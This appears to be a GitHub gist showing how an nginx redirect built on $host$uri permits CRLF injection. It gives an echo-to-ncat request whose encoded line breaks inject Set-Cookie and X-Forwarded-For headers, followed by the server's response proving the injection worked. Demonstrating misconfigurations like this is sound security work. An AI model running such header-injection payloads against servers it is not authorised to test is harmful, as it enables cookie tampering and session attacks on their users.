Created
April 1, 2021 10:47
-
-
Save yoramvandevelde/c1cd49e0c53c954b449980fb34bfac54 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Problem with header manipulation because of CRLF injection | |
| # on nginx this is because of $host$uri usage over $host$request_uri | |
| $ echo -e "GET /%0D%0ASet-Cookie: hack%0D%0AX-FoRwArDeDFor: yoram HTTP/1.1\r\nHost: $HOSTNAME\r\n" | \ | |
| ncat $HOSTNAME 80 | |
| HTTP/1.1 301 Moved Permanently | |
| Server: nginx | |
| Date: Thu, 01 Apr 2021 10:15:40 GMT | |
| Content-Type: text/html | |
| Content-Length: 162 | |
| Connection: keep-alive | |
| Keep-Alive: timeout=20 | |
| Location: https://$HOSTNAME/ | |
| Set-Cookie: hack | |
| X-FoRwArDeDFor: yoram | |
| <html> | |
| <head><title>301 Moved Permanently</title></head> | |
| <body> | |
| <center><h1>301 Moved Permanently</h1></center> | |
| <hr><center>nginx</center> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment